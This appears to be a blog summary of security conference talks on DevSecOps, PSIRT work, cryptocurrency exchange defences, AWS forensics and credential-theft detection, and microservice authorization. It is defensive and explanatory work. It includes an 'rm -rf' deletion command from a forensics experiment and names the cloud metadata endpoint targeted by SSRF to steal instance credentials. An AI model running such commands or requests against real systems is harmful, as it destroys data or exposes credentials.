She doesn’t like the term “DevSecOps,” because when we mash things together as a community, each person has a different idea of what it is and what it means. To her, it means that we see what the dev process actually is, where flaws are coming up, where certain teams need more educuation, where certain teams need to slow down, and where security automation should be added, deconstructing the whole process and figure out how we can reconstruct it with security along the way.

The devs she works with are happy to receive security advice and go through these extra steps because their nightmare scenario is deploying code that leads to a breach and headlines. Dev teams view the security team as helping them prevent these catastrophes.

There can be contention at times, but when the security team sits with devs and explains why certain practices are being used and their value, dev teams get it and see that security is there to help.

Describe your approach to using SAST, DAST, code review, bug bounty, and pen testing.

Martin
SAST can be a double-edged sword, you’re telling a dev that they’ve made it this far but have to go back. The best way he’s seen to do this is to view it as an education opportunity: if you find the same problem over and over from same repo or dev, help them get better. Security automation isn’t the answer, ultimately you want to instruct devs.

They’ve explored using bug bounty. It’s a lower cost model in which you get nebulous testing capabilities against assets that are in scope, but it does provide the value that it’s another opportunity for educating devs.

Shyana
She joined her current company when they had no security team but they already had a bug bounty program. She felt like they weren’t sophisticated enough to have the bug bounty program yet- the issues that were found didn’t add much value to the org. She put the program on hold until they were ready to take it on.

They get third-party pen tests with letters of attestation, which is a selling point for their customers. They also use pen testing as assurance for third parties they use.

Colleen
However you’re going to grow your org, at the end you’ll have a suite of things testing your code. There can be a lot of value in SAST and DAST, but you’ll probably go through a really long PoC and find that tools only partially work. Her challenge with SAST is that it requires lots of tuning and finds many FPs. This is an issue as you don’t want to give a raw report of 1000s of potential issues to devs.

As they’re building out their suite of tools for testing, they’ve found pen tests great for coverage as well as helping customers and ISO auditors feel good.

Segment has found bug bounty quite useful, depending on the researchers who are engaged. When a researcher writes up a really good PoC for an issue, you can weaponize it - when their security team submits it to the dev team, they drop everything and scramble to fit it, as it’s an issue found by someone external to their org who doesn’t know how everything works. This definitely lights a fire under everyone’s asses.

Richard
It helps to have someone on the security team with dev experience so they can participate in discussions around the validity of SAST and DAST findings to determine if the claimed mitigating controls are in fact appropriate.

Bruce
SAST and DAST are not a hammer - don’t beat up devs until they get things right. The idea is to find teachable moments. We shouldn’t have to wait for SAST/DAST scans for the smart people to work for us to find these things and autocorrect.

Work together as a team using the tools that make sense. Bug bounty is a tool. If it doesn’t make sense, don’t waste time and effort on it.

You don’t want to case friction between security and engineering if a tool is finding things your org doesn’t care about.

What’s the most important bit of advice you can share with security leaders and devs to help the security team and devs engage together?

Colleen
Their security training, which aims to teach devs to think like a hacker, has been hugely successful. They use OWASP Juice Shop for hands-on practice, give tailored examples based on Segment’s tech stack, and they’ve asked devs to write up what they’d like to get out of the training to ensure the training meets their needs.

When you’re creating security training, don’t have your security hat on, have your dev hat on. What is it that’s missing from the traditional training you’re giving them? How can you mix things up? Devs are smart, engaged, and want to partner with the security team, make it easy to do that.

Their training has a CTF element, which makes people exited to be on the leaderboard and compete against their friends.

Your security team will never be big enough to keep pace with the rest of the org, so the secret is evangelizing and converting devs into writing code with a security mindset.

Shyvana
Staffing is something we all struggle with. She recommends starting to look internally, pluck people out of various parts of the org who may not even be in tech. She has an excellent security team member who was previously worked in the call center.

Bruce
His #1 security hire in the last 2 years was their former receptionist, a political science major who loves security.

“You’ll find people who are really good in all places.”

(Audience question) I’m a member of a developer team, how do you effectively manage upwards?

Colleen
One thing she’s learned working with executives is they don’t want to get in trouble.

Work with your security team to compile stats on the types of flaws your company has. Maybe there’s some disturbing pattern that keeps coming up.

Throw some metrics in front of the executives and do a demo to show how easy it is to use those flaws to create a really scary exploit. This can help make the executive suite aware that when there’s a legitimate risk that you bring them and they decide to ignore it, it’s off your chest and onto theirs. No one wants to be in the headlines.

Show them in black and white, we found this risk in our infrastructure, all someone would have to do is combine this and that to do something serious, and demo it for them.

“It’s like DARE in the 80’s, it gets them scared straight.”

It depends…

Kristen Pascale, Principal Techn. Program Manager, Dell EMC
Tania Ward, Consultant Program Manager, Dell
abstract slides video

Kristen and Tania describe what a PSIRT team is, Dell’s PSIRT team’s workflow, common challenges, and how PSIRT teams can work earlier in the SDLC with development teams to develop more secure applications.

The #1 job of a product security incident response team (PSIRT) is to minimize incidents by managing vulnerabilities. They handle the initial receipt, triage, and internal coordination of vulnerablity reports, for example, from an external security researcher. This can be quite challenging, as Dell’s PSIRT team handles thousands of diverse products.

It Depends: The Vulnerability Response Ecosystem
  1. Vulnerability Report: Receive the report from a third-party researcher or other source and ensure it contains sufficient info. Route to the appropriate engineering team.
  2. Investigation: Impact Assessment: The relevant engineering team is responsible for determing if the issue is exploitable and its impact/risk
  3. Remediation Planning: A timeline for the fix is set and what needs to be done is decided.
  4. Tracking Remedy: Ensuring the vuln is fixed and documentation is created that will be used in the disclosure.
  5. Disclosure: Details of the issue, the fix, and the upgrade path for how customers should secure themselves is distributed to affected parties.

The speakers emphasize that disclosure is the most important part, as it gives customers what they need in order to secure their environment. And when customers reach out asking if they’re affected by a newly publicized issue, like Heartbleed, they want answers fast!

Challenges

There are several fundamental challenges here:

  • The effectiveness of the PSIRT team’s response largely depends on several factors outside of their control. For example, they rely on engineers to do appropriate triaging of an issue to determine its impact and how it should be fixed.
  • If products don’t have an accurate, up-to-date bill of materials (BOM), then it can be a big endeavor to determine if they are effected by a newly disclosed vulnerability.

Another problem they run into is that they’re unable to deliver a timely fix because the upgrade path given by the affected provider or community isn’t compatible with their product - they’ve added features and functionality since they initially embedded the third-party component in the product and haven’t updated it in a long time. Now when they try to update it, things break. Similarly:

  • The component may be embedded in a way that the product requires a major architectural change to update it.
  • The supplier of the component is no longer supporting it. “This has happened a lot.”

This is where the shit hits the iceberg and the clock starts ticking.

It Depends: Continuous Integration / Delivery

Recommendations

Kristen and Tania make a few recommendations:

  • When you’re designing an application, ask yourself, “Have I architected this in a way where I’ll be able to effectively update it in the future?”
  • Consider having a central, managed location hosting third-party code that all projects pull from. This can be invaluable for tracking products’ BOMs and thus easily updating and diagnosing when they’re affected by vulnerabilities in the future.
    • If having an org-wide repository for third-party code is infeasible due to your org’s size, consider having one at a business unit or project level.
  • Have an owner, both org-wide as well as for each product, for the third-party components used. They are responsible for ensuring ownership and management of these dependencies from the start to sunset of the application.
  • Keep track of each product’s BOM using automated tooling. Keep up to date with vulnerabilities in that are released for each dependency as well as their current development state: have they not received a patch in several years? Are they being end-of-lifed?
  • Third party components are a part of your system - consider how they change the threat model / attack surface of the apps they’re included in.
  • The PSIRT and development teams need to work together so that everyone understands the downstream effects and total cost of ownership of the third-party dependencies being used.

See BoMs Away - Why Everyone Should Have a BoM for more details about automatically creating BOMs.

My Thoughts: Your Mileage May Vary
This recommendation of controlling what third-party dependencies developers can use woud be a tough sell in many companies I’ve spoken with, where speed and time to market/iterate are king. Security teams at these companies are responsible for supporting devs in building things securely, but can rarely be blockers or make changes that cause too much friction.

On the Frontlines: Securing a Major Cryptocurrency Exchange

Neil Smithline, Security Architect, Circle
abstract slides video

Neil provides an overview of cryptocurrencies and cryptocurrency exchanges, the attacks exchanges face at the application layer, on wallets, user accounts, and on the currencies themselves, as well as they defenses they’ve put in place to mitigate them.

Background

Cryptocurrencies are blockchain-based, decentralized (ish), are tradeable and fungible (e.g. two $1 bills are equivalent) assets, are secured by cryptography. There are ~1,658 cryptocurrencies as of March 2018.

A cryptocurrency exchange provides a place for buyers and sellers to trade cryptocurrencies. If you want to turn Bitcoin into Ethereum, they provide the connection between the people who are buying and selling.

Cryptocurrency Exchange: Architecture
A high level, approximate architecture diagram of what a cryptocurrency exchange likely looks like.

Overall this mostly looks like a standard web application, but note that instead of a database on the right-hand side, data is instead stored on the blockchain, which is outside of their control

Cryptocurrency exchanges are juicy targets because:

  • Transactions are near-instant and withdrawals are final - there’s no way to get the money back (cryptographically impossible).
    • This is quite attractive for criminals, because credit card purchases can be repudiated, bank transfers can be canceled or pulled back, but you can’t do that here.
  • The blockchain is anonymous - while most exchanges require you to prove your identity, once you get on to the blockchain itself it’s fairly anonymous.
  • Evolving regulation and enforcement
  • Truly transnational
  • Massive target - December 2 market cap of top-100: $129,893,042,547.

In the rest of the talk, Neil discusses attacks on the application layer, wallets, user accounts, and on currencies themselves.

Attacks on Application Layer

At the application layer, there’s nothing unique about attacking exchanges, the standard OWASP-style web, mobile, API attacks apply: DDoS, XSS, SQLi, CSRF, credential stuffing, etc.

Attacks on Wallets

Wallets are 3rd-party code running within their firewall/VPC.

They have to trust the wallet dev team to some extent, or otherwise they shouldn’t run the wallet or support the coin.

Circle/Poloniex supports roughly 60 currencies, so they have this trust relationship with a number of third parties. There have been cases in the past where exchanges installed a malicious wallet that stole all the currency they were storing, so this isn’t a hypothetical risk.

Defenses

  • Minimize exposure of wallets to valuable assets
    • Use Docker/VMs
    • Restrict wallet access to private keys when possible (only supported by some wallets)
    • Maintain minimal currency in online “hot” wallet, the rest is stored on offline “cold” wallets. This restricts a successful attacker to only being able to drain the money in “hot” wallets.
  • Supply-chain security
    • Ensure you’re using “official” wallets
    • Verify the identity of wallet developers when communicating with them

Attacks on User Accounts

These types of attacks are not specific to cryptocurrency exchanges.

The core reasoning here is it’s easier to hack a user’s account than an exchange.

Stealing money from banks is much less attractive - how are you going to get the money out? Trying to transfer the money to a bank account you control will still take 3 - 5 days to settle and when the bank finds out they’ll just cancel the transaction, so the attacker won’t get the money.

Circle/Poloniex talsk with other exchanges, and they see individual people stealing $1M / month through attacking user accounts.

Example attacks they see include: phishing sites, computer/mobile device malware, fake “support” sites, email account takeovers (ATOs), SIM swapping, domain takeovers, or social engineer support staff.

Defenses

Strongly encourage (or even require) 2FA - Pester users to add 2FA, and provide strongg 2FA (ideally U2F/Yubikey or Google Authenticator rather than SMS).

U2F and Yubikey are preferable, as they’re phishing resistant. Users with Google Authenticator can be phished, where they share the current TOTP value, and they’ve seen some people give away their seed value.

Some exchanges will give you additional functionality once you enable 2FA, e.g. you need it to deposit or withdraw more than a certain amount at once.

If you have a lot of money in your account, SMS isn’t really better than nothing.

They’ve added some protections that for significant operations you need to provide two 2FA codes, separated by at least one time transition, so an attacker has to steal 2 codes to do anything important.

Other protections:

  • HaveIBeenPwned integration
  • Maximum daily withdrawal limit
  • Anti-phishing service - they partner with a company that crawls the Internet looking for phishing sites and mobile stores for copycat apps and gets them taken down.
  • Lock/restrict account on significant changes, such as the removal of 2FA
  • Risk-based (algorithmic triggered) withdrawal security
    • If something looks phishy, they may make you do a 2FA and/or confirm via email.
    • Other times they’ll block a transaction until they have someone in customer support manually review the transaction. This would be unthinkable in traditional banking, but is not uncommon in cryptocurrencies.

Factors they consider risky include: user with a new IP address, having a recent password/2FA change, new country, use from an email or IP with bad reputation, trading history (some criminals will put a certain amount of value in, then take the same value out, to “launder” it, as they’ll get different Bitcoins back on the withdrawal).

See the summaries for Browser fingerprints for a more secure web and Leveraging Users’ Engagement to Improve Account Security for more ideas in protecting user accounts.

Attacks on Currencies

“51% double-spend attack” lets you spend the same money twice, which requires that the attacker has more hashing power than the rest of the blockchain. This attack has happened in practice: a May 2018 attack on Bitcoin Gold costed 6 different exchanges $18M and a January 2019 attack on Ethereum Classic costed $1.1M.

Cryptocurrency Exchange: Double Spend

Defenses

  • Know your customer (KYC)
  • Withdrawal limits: have a fixed maximum spend/withdrawall limit (lower for new customers) and implement risk-based controls
  • Track the currencies’ health carefully and respond quickly
    • Set confirmations appropriately - They don’t transfer funds util they ee at least N confirmations. The more confirmations you require seeing before giving a user the funds, the more expensive it is to do the attack.

They built a tool to show how much it would likely cost to rent the compute cost power to do a 51% attack, the overall available compute that can be rented, and other factors that may indicate how likely an attack is to occur.

If you’re into smart contract security, check out the Decentralized Application Security Project (DASP) Top 10, it’s basically the OWASP Top 10 but for smart contracts.

The Art of Vulnerability Management

Alexandra Nassar, Senior Technical Program Manager, Medallia
Harshil Parikh, Director of Security, Medallia
summary abstract slides video

In this talk, Alexandra Nassar of Medallia describes how to create a positive vulnerability management culture and process that works for engineers and the security team.

  • Meet with engineers to understand their workflow and pain points in your current vulnerability management process. Learn the systems and tools they use and how they use them.
  • Use development teams' language and terminology whenever possible to maximize inter-team understanding and minimize confusion.
  • Fit the vulnerability management process into how development teams currently work; do not force them to use an external tool, the friction is too high.
  • Every security ticket that reaches development teams should a) be verified to be a true positive, b) needs to contain all of the relevant contextual information so developers can understand the issue and its relative importance, and c) have clear, actionable guidance on how to fix it. Adopt a customer service-type of interaction model with development teams.
  • Create a single, all-encompassing vulnerability management process that all vulnerabilities flow through: a single entry point and process that is followed, from entry, to triage, to resolution. Create this process based on interviewing development and security teams to understand their needs, and manually sample previous bugs to determine what bug "states" were needed in the past.
    • Once you make process changes, meet with all of the affected teams to ensure they understand why the changes were made and how they can effectively adopt the new process; don't assume they'll automatically get it.
  • Determine the set of meta info you're going to track about vulnerabilities and track them consistently; for example, the severity ("priority"), CVSSv3 score and vector, relevant team and/or project, release tag, the source that found it (pen test, bug bounty, etc.), and its due date.
  • Track metrics over time (number of bugs found, by source, by criticality, number of bugs past SLA, etc.). Use these metrics to diagnose process problems as well as areas that merit deeper investment from the security team for more systematic, scalable wins. Share metrics with leadership so they understand the current state of affairs, and consider using metrics to cause some healthy competition between teams.
  • Get your colleagues excited about security via internal marketing efforts, like gamifying security metrics, holding CTFs and bug bashes, and distributing swag, like stickers, t-shirts, or custom badges for people who make efforts in security.

Read the full summary here.



Cloud Security

Cloud Forensics: Putting The Bits Back Together

Brandon Sherman, Cloud Security Tech Lead, Twilio
abstract slides video

Brandon describes an experiment he did in AWS forensics (e.g. Does the EBS volume type or instance type matter when recovering data?) and gives some advice on chain of custody and cloud security best practices.

Motivation

If something bad happens, how can we determine how bad that something was?

Compromises happen, so we need to build detection capabilities and processes for doing forensic investigations. These investigations should have a rigorous, repeatable process: post-incident is not the time to be developing techniques. Adhoc forensic processes can lead to important data being lost.

One thing that motivated Brandon to pursue this research was curiosity: how can one determine if an attacker tried to cover their tracks? Have they deleted log files, caussed log files to roll over, used a dropper that erased itself, something else?

The Cloud

This talk focuses on AWS, and specifically the following services:

  • Elastic Cloud Compute (EC2): VMs on demand.
  • Elastic Block Storage (EBS): A virtually attached disk, kind of like network attached storage. You can specify its size, where you want to attach it, and there are various backing storage options.
  • Identity and Access Management (IAM): Fine-grained access controls that enable you to dictate who can perform which API calls on what resources.
  • Simple Storage Service (S3): Key-value store of binary blobs. When EBS volumes are snapshotted, they can be stored as objects in S3.

The slides give other useful info about these services that I’m skipping here for brevity.

Open Questions

In this work, Brandon sought to answer the following questions:

  1. If a snapshot of an EBS volume is taken, will that snapshot only contain in-use blocks, or are deleted blocks also included?
  2. Does it matter what the original EBS volume type is? Has AWS changed their implementaiton between versions?
  3. Does the instance type matter? Does NVMe vs SATA make a difference?

Experiment Process

Brandon’s methodology was the following:

  1. Launch a selection of EC2 instances (nano, medium, large, etc.)
  2. Attach one of each EBS volume type to each class of instance
  3. Write files (known seed files)
  4. Delete files
  5. Snapshot disks
  6. Rehydrate snapshot to new disk
  7. Look for files
sudo aws s3 sync s3://seed-forensics-files /mnt/forensic_target
sync && sleep 60 && sync && sleep 60
rm -rf /mnt/forensic_target/*
sync && sleep 60 && sync && sleep 60

Tools / Scripts Used

PhotoRec is free software that can find deleted files, originally created for recovering photos from camera SD cards. It does this by looking at the raw blocks of a disk and compares the data to known file signatures (e.g. magic bytes).

Brandon wrote a script, forensics.rb, that will rehydrate each snapshot to an EBS volume, attach it to an instance, run PhotoRec and look for deleted files.

Results: Comparing File Hashes

Many files were dumped into the recovery directory, and not all were seed files written to disk during the experiment. One potential cause is the files could be recovered from the AMI- AMIs are snapshots and thus contain deleted files.

Frequently, more files were returned than originally seeded to disk, even when a non-root volume was used, as PhotoRec has to guesss where files begin and end. Text files, for example, don’t have clearly defined magic numbers and end of file markers.

So Brandon instead tried comparing the first n bytes of recovered files to the original files, where n can be set based on your tolerance for false positives.

Results: Comparing File Bytes

  • Source instance type (SATA vs NMVe) had no detectable effect
  • Recovery success varied based on source volume type
    • Best recover rates: standard, gp2, io1 (80+%)
    • Less good: sc1, st1 (20-50%)
  • Some weird artifacts were recovered
  • Recovery of PDFs from sc1/st1 based drives resulted in massive files (but not other drive types)

Why? The root cause for these results was not easy to determine.

On the Research Process

In the Q&A section, one audience member asked if the observed results were indicative of PhotoRec vs tools specifically made for these sorts of forensics uses. As Brandon only used PhotoRec, he said the results could be a function of the tool itself or the nature of the volumes examined, though some aspects seemed endemic to a given volume type.

I thought this was a good question. In general, when you're doing research projects, it's easy to be focused on the details as you get into the weeds, but it can be useful to periodically step back and ask meta questions about your methodology, like:

Are there other factors or confounding variables that might make my experiment not as conclusive as I'd like?

I really liked how Brandon decided on the research questions he wanted to answer, determined a methodology for answering them, and then ran his process across many combinations of instance and EBS volume types. It would have been easy to do this less rigorously, but that would have made the results and the talk weaker.

My approach when doing research is kind of like agile prototyping a new product: get as much early critical feedback as possible, even in just the ideation phase, to vet the idea. Specifically, I try to run ideas by experienced security colleagues who can help determine:

  • How useful is this idea? To whom?
  • Has it already been done before?
  • Is there related work that I should make sure to examine before starting?
  • How can I differentiate from prior work?
  • Would a different angle or tact make this work more impactful, useful, or meaningful?

After this verbal trial by fire, if the idea passes muster, I then make a reasonable amount of progress and then run it by colleagues again. These checkins can be valuable checkpoints, as the work is more defined (tools used and your approach becomes concrete rather than theoretical) and you have some preliminary results that can be discussed.

This approach has made every research project I've ever done significantly better. It can be scary opening your idea up for criticism, but I can't emphasize enough how useful this is.

Chain of Custody

An attacker who has gained access to your AWS account could delete snapshots as you take them, causing valuable forensic data to be lost.

It’s best to instead copy all snapshots to another, secured account.

AWS accounts are like “blast walls” - an explosion in one account cannot reach other accounts, limiting the blast radius.

Brandon advises enabling AWS CloudTrail, which records most APIs calls (what was done by who from where), and writing the log files to a separate account to the one owning CloudTrail.

Takeaways

What does your threat model look like?
This influences how you structure accounts, what and how much you log, etc. Understand the limitations of the tools and services you’re using.

Consider writing only to non-root EBS volumes
This eliminates the large number of recoverable files deleted from the AMI, potentially making forensic tools less noisy.

Use multiple AWS accounts
So that a breach of a server doesn’t mean a breach of everything. Again, having separate accounts limits the blast radius. Enable CloudTrail and keep everything related to forensics as isolated as possible.

Be careful what you write to an AMI, especially if it’s going to be shared
If you write sensitive info (such as secrets) to your AMI as part of the baking process, it could be recoved.

Detecting Credential Compromise in AWS

Will Bengston, Senior Security Engineer, Netflix
abstract slides paper video

Will describes a process he developed at Netflix to detect compromised AWS instance credentials (STS credentials) used outside of the environment in which they were issued. And it doesn’t even use ML!

Detecting Credential Compromise in AWS: Not ML
If Will had said ‘machine learning’ and threw in ‘blockchain’, he’d probably be relaxing on a beach sipping margaritas with those sweet VC dollaz, rather than giving this talk. But fortunately for the security community, he’s continuing to share more awesome security research.

The AWS Security Token Service (STS) is a web service that enables you to request temporary, limited-privilege credentials for AWS Identity and Access Management (IAM) users or for users that you authenticate (federated users).

What’s the Problem?

When you create a credential in AWS, it works anywhere - in your environment or from anywhere on the Internet. Will and his colleagues wanted to lock this down, so that Netflix AWS credentials could only be used from instances owned by Netflix.

This is important because attackers can use vulnerabilities like XXE and SSRF to steal AWS instance credentials and use them to steal sensitive customer data or IP, spin up many servers to do cryptomining, cause a denial of service to Netflix’s customers, and more.

AWS GuardDuty can detect when instance credentials are used outside of AWS, but not from attacker’s operating within AWS.

How do we detect when a credential is used outside of our environment?

Why is this Hard?

This is challenging due to Netflix’s scale (they have 100,000’s of instances at any given point in time) and their environment is very dynamic, IP addresses they control are constantly changing, so it’s not trivial to determine which IP they own at a given point in time.

Another aspect that makes this hard is AWS’s API rate limiting - using the AWS APIs to fully describe their environment across the 3 regions they’re in takes several hours.

The solution Will ended up finding successful leverages CloudTrail.

CloudTrail

AWS CloudTrail provides event history of your AWS account activity, including actions taken through the AWS Management Console, AWS SDKs, command line tools, and other AWS services.

These logs are accessible via the console or you can send them via S3 or CloudWatch logs. Note that the delivered logs can be 15 to 20 minutes delayed, so your detection based on these logs will be a bit delayed as well.

Here’s an example CloudTrail log file from the docs:

{"Records": [{
    "eventVersion": "1.0",
    "userIdentity": {
        "type": "IAMUser",
        "principalId": "EX_PRINCIPAL_ID",
        "arn": "arn:aws:iam::123456789012:user/Alice",
        "accessKeyId": "EXAMPLE_KEY_ID",
        "accountId": "123456789012",
        "userName": "Alice"
    },
    "eventTime": "2014-03-06T21:22:54Z",
    "eventSource": "ec2.amazonaws.com",
    "eventName": "StartInstances",
    "awsRegion": "us-east-2",
    "sourceIPAddress": "205.251.233.176",
    "userAgent": "ec2-api-tools 1.6.12.2",
    "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-ebeaf9e2"}]}},
    "responseElements": {"instancesSet": {"items": [{
        "instanceId": "i-ebeaf9e2",
        "currentState": {
            "code": 0,
            "name": "pending"
        },
        "previousState": {
            "code": 80,
            "name": "stopped"
        }
    }]}}
}]}

Solution: Take 1

The first approach Will tried worked as follows:

  • Learn all of the IPs in your environment (across accounts) for the past hour
  • Compare each IP found in CloudTrail to the list of IPs
    • If we had the IP at the time of log - keep going 👍
    • If we DID NOT have the IP at the time of the log, ALERT

However, this approach did not end up working due to AWS API restrictions (pagination and rate limiting).

Solution: Success!

The solution that did work leveraged an understanding of how AWS works and making a strong but reasonable assumption. This approach lets you go from 0 to full coverage in about 6 hours (the length of credentials being valid) and can be done historically.

Detecting Credential Compromise in AWS: AWS Process Overview

The strong assumption is: we assume that the first use of a given credential is legitimate, and we tie it to the current IP we observe for it.

A session table is maintained that tracks identifier, source_ip, arn, and ttl_value over time for each credential.

Detecting Credential Compromise in AWS: Solution
The pink path detects a potential compromise, that is, a CloudTrail event with an AssumedRole corresponding a to source IP that is not already present in the session table

At 28:22 Will shows a video of the process working in practice, including a Slack bot that messages a specific channel when good or bad credential usages are observed.

Edge Cases

There are a few edge cases you need to account for to prevent FPs:

  • AWS will make calls on your behalf using your creds if certain API calls are made (sourceIPAddress: <service>.amazonaws.com)
  • If you have an AWS VPC endpoint(s) for certain AWS services (sourceIPAddress: 192.168.0.22)
  • If you attach a new ENI or associate a new address to your instance (sourceIPAddress: something new if external subnet)

Preventing Credential Compromise

While this approach is effective in practice, it’s not perfect.

Using server-side request forgery (SSRF) or XXE, an attacker could steal an instance’s credentials and then use them via the same method.

Specifying a blacklist of all of the ways a URL could represent http://169.254.169.254 in a WAF is prohibitively difficult, so they tried a managed policy that protect resources that are supposed to be internal only. However, this doesn’t protect externally exposed instances, of which they have many.

They looked at what GCP was doing, and observed that their metadata service required an additional header, which is great for protecting against these sorts of attacks, as typically with SSRF you can’t control the request’s HTTP headers.

Will went to the global AWS SDK team and asked if they’d be willing to add an additional header on every request, as it would allow them to build a proxy that protects the metadata service endpoint by blocking every request without that header.

The team said they can’t do that, as they didn’t want to send an additional header the IAM team wasn’t expecting.

So Will reviewed the various open source AWS SDK libraries, and observed that the Ruby one wasn’t sending a user agent, so he submitted a PR that added a user agent to its requests that indicates that it’s coming from the AWS Ruby SDK. When that PR was accepted, he took it to the Java and Python boto SDK teams and got their buy-in as well.

After each SDK team had implemented a user agent clearly demarcating that it was coming from an AWS SDK, Will went to the global AWS SDK and asked them to commit to having these user agents not change, so that AWS users could implement a proxy deploying these protections.

A Masterclass in Organizational Influence
Though this story was just an aside in the overall presentation, it really stuck out to me as an impressive example of getting buy-in across diverse teams with different priorities. Nice work!

Resources

And as I called out in tl;dr sec #14, almost a year later, AWS released the v2 of the Instance Metadata Service, which implements several changes to make stealing instance credentials via SSRF or other web attack significantly harder in practice.



Containers / Kubernetes

Authorization in the Micro Services World with Kubernetes, ISTIO and Open Policy Agent

Sitaraman Lakshminarayanan, Senior Security Architect, Pure Storage
abstract slides video

The history of authz implementation approaches, the value of externalizing authz from code, authz in Kubernetes, and the power of using Open Policy Agent (OPA) for authz with Kubernetes and ISTIO.

Types of Access Control

Sitaraman describes 3 types of access control:

  • Role based: A set of roles are defined which map to API endpoints that may be hit or permissions the role has.
    • Then there are checks in code for the current users’s role or set of permissions.
  • Attribute based: Various aspects of a user or a request are used to make the decision, for example, the user’s age, title, location / IP address, or other attributes.
    • This may be a combination of inline code and external API calls to systems that have this additional info.
  • Policy based: A combination of the above two types, in which you define what role or group can perform what actions on a resource under certain conditions.
    • For example, Admin users who are on the VPN can add new Admin users to the system.

History of Access Control Implementations

Sitaraman describes how implementing acccess controls in web applications has evolved over time.

Firewalls could perform very crude access controls (mostly by network location and port), external API gateways can restrict access to specific endpoints, internal API gateways can protect internal only services you don’t want to expose, and custom business logic can be implemented in code for more nuanced, endpoint-speccific decisions.

Challenges to Access Control Approaches

Implementing access controls in code means that the code must be updated whenever you want to modify authorization logic.

  • The update may not be quick and easy, meaning that fixing a bug takes time.
  • Updating a service in a complicated ecosystem with interdependencies between services may be hard.
  • If the expectations of what a role should or should not be able to do changes over time, assumptions about the purpose of a role are littered throughout a code base.
  • Understanding the expected permissions for a role may be non obvious, as the decisions are potentially littered through one or more large, complicated code bases.
  • Code changes require solid regression testing for access control bugs.

Pushing all access control decisions to API gateways can quickly become hard to manage in complex ecosystems with many roles and rules. Ops teams typically own the API gateway, so devs can’t directly make these changes, slowing down velocity due to the additional communication and process overhead.

How Do We Move Forward?

The goal is to externalize authorization from code, and not just with a gateway that acts as a checkpoint. It needs to be developer-friendly, and easy to developer, deploy and change policies.

The idea of externalizing authorization from code is actually not new, API gateways did this, as did the Extensible Access Control Markup Language (XACML) standard. It allowed the security or product teams to set authorization rules, not just devs.

However, XACML ended up failing because it required learning a separate, complicated syntax, causing more work for developers, and there weren’t many open source integrations.

What About Building Your Own Authorization API?

Authz in Microservices World: Authz API
Implementing authorization as a separate service or library that applications call

Pros:

  • As you own it, you can have it work exactly how you want, making it fit into your ecosystem nicely.

Cons:

  • Your security or engineering team will have to build and maintain it.
  • You’ll likely need to build (and maintain) client library SDKs for every language you use at your enterprise.
  • You’ll need to train every dev on your API and integration, and there’s no open source community to source information from.

In the end, Sitaraman argues that for many companies this isn’t a worthwhile investment due to both the upfront and recurring time costs. All of these efforts detract from building new features and improving your company’s product, which delivers business value.

Kubernetes Authorization

Authz in Microservices World: Kubernetes Authorization

Kubernetes web hook authz uses the following 3 aspects to make decisions: the resource being accessed, the action being performed (GET, POST, …), and the incoming user identity / token. Once enabled, every request to the Kubernetes will invoke the web hook and return an Allow or Deny.

Why Sitaraman Loves the K8 AuthZ Model

  • It provides the framework and lets customers manage their own Risk.
  • There’s no one size fits all RBAC model that you have to conform your usage to, as is the case in some vendor models.
  • API-first design – everything is a Resource.
  • Externalized Authorization through the web hook lets you manage risk and implement policy and process around your deployment.

However, K8z authz can’t be used for your microservices and business-specific APIs. Instead, you need something like ISTIO.

ISTIO Overview

ISTIO acts like a proxy for you, handling protocol translation, and makes it easy to enforce authorization, do logging, collect telemetry, and set quotas. Typically you deploy the Envoy proxy as a sidecar.

In short, ISTIO is a lightweight proxy in front of your API Services and operates at the Ingress and Egress layers

Authz in Microservices World: ISTIO

ISTIO Authorization

ISTIO authz is specified in YAML files. Fine-grained ACLs can be challenging, and while this authz is external to the primary code, it still requires re-deployment when authz rules are changed.

apiVersion: "rbac.istio.io/v1alpha1"
kind: ServiceRole
metadata:
  name: tester
  namespace: default
spec:
  rules:
  - services: ["test-*"]
    methods: ["*"]
  - services: ["bookstore.default.svc.cluster.local"]
    paths: ["*/reviews"]
    methods: ["GET"]

ISTIO Service to Service

While deploying ISTIO hides the complexity of service discovery and service invocation (e.g. mTLS, protocol translation, etc.), we still need to do authz locally to each service.

We’re still reinventing the wheel: each client has its own authz embedded in the code or at the proxy level.

Externalizing AuthZ in a Microservices World

Let’s take a step back. What do we need to do authz in a microservices world? We need:

  • The Resource (end point being invoked)
  • The Operations / Actions being performed
  • Identity of Caller
  • Payload

You could build your own solution, or use Open Policy Agent!

Open Policy Agent

OPA is a policy engine, available as a RESTful JSON API, in which policies are written in the declarative language Rego. Policies are updated in OPA via the /v1/policies API endpoint.

OPA Policy Walkthrough

# Package Name
package httpapi.authz

# Static Data
subordinates = {"alice": [], "charlie": [], 
               "bob": ["alice"], "betty": ["charlie"]} 

# "input" is a keyword. 
# Assign input as the http_api variable
import input as http_api

# Examines the input to see if the request should be allowed.
# In this case, if the HTTP method is GET and the path is
# /finance/salary/<username>, where <username> is http_api.user
# Returns True if everything evaluates to True
allow {
  http_api.method = "GET" 	
  http_api.path = ["finance", "salary", username] 	
  username = http_api.user 
}

An example Python script to invoke this OPA policy:

# Gather Input. 
# HTTP Filter that gathers all the data,
# such as User, Method, URL Path, etc.

# Create input to hand to OPA "input": 
input_dict = { 
  { "user": api_user_from_jwt, 
	  "path": finance, 
	  "method": GET
	} 
}

# Call OPA via POST to /v1/data/{PolicyName}
# and supply the Input. Decision returned as JSON
rsp = requests.post("http://example.com/v1/data/httpapi/authz", 
        data=json.dumps(input_dict)) 

# JSON is returned with allow:True or can be any specific data
if rsp.json()["allow"]
Authz in Microservices World: OPA and API Authz
Architecture of a client calling the OPA API

Benefits of OPA

  • You can update the authz policy without changing the source code. Policies can be hot swapped.
  • There’s an API where you can get what authz decisions have been made, for example, how many were successful, how many were denied, etc.
  • Policy definitions can be left to development teams to implement, but left outside of the core business API.
  • OPA can be used beyond the REST API: any external system that has support for plugins, OPA can be integrated as a plugin (e.g. Kafka topics, SSH auth, thrift, AWS console, and more).

Can Kubernetes Keep a Secret?

Omer Levi Hevroni, DevSecOps Engineer, Soluto
abstract slides video

Omer describes his quest to find a secrets management solution that supports GitOps workflows, is Kubernetes native, and has strong security properties, which lead to the development of a new tool, Kamus.

Requirements

Going in to his search, Omer had the following requirements for an ideal solution:

  • GitOps (placing the code, manifest files, and secrets in a git repo that is then distributed to the Kubernetes pods.
  • Kubernetes native - easy, seamless integration with Kubernetes
  • Secure - High quality, secure code, and “one-way encryption” (once the secret is encrypted, it can only be decrypted by the application that will be using it)

